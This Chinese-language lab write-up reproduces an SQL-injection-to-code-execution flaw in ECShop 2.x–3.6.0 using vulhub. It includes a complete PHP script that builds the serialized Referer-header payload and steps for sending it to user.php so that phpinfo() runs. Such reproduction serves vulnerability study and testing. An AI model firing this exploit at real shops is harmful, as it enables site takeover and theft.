ECShop SQL注入任意代码执行漏洞复现是怎样的,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。该漏洞在3.6.0版本之后已修复
影响版本: Ecshop 2.x Ecshop 3.x-3.6.0
下面仅作漏洞复现记录与实现,利用流程如下:
一、漏洞环境搭建
本次复现环境采用vulhub搭建,执行以下命令搭建平台
cd vulhub/ecshop/xianzhi-2017-02-82239600/
docker-compose up -d
执行之后开放8080端口(2.7.3版本)与8081端口(3.6.0版本)
mysql地址填写 mysql,mysql账户与密码均为 root,数据库名随意填写,但2.7.3与3.6.0的数据库名不能相同。
安装完毕后访问如下图所示
2.7.3版本
3.6.0版本
漏洞链接:http://192.168.101.152:8080/ http://192.168.101.152:8081/
二、漏洞复现
在vulhub上有漏洞利用脚本,拷贝下来放入seay工具的代码调试功能再执行就能得到poc了
<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$test = sprintf("*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -", bin2hex($id), $shell);
$arr = array();
$arr["num"]=$test;
$arr["id"]=$id;
$s = serialize($arr);
$hash4 = '45ea207d7a2b68c49582d2d22adf953a';
$hash3 = '554fcae493e564ee0dc75bdf2ebf94ca';
echo "POC for ECShop 2.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash4}ads|{$s}{$hash4}";
?>
2.7.3版本
访问http://192.168.101.152:8080/user.php链接,使用burp抓包,添加referer请求头,然后将poc放入再请求,可以看到执行了phpinfo()
3.6.0版本
也是一样的步骤,访问http://192.168.101.152:8081/user.php,使用burp抓包,将poc放入referer请求头中,就可以看到执行了phpinfo()
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。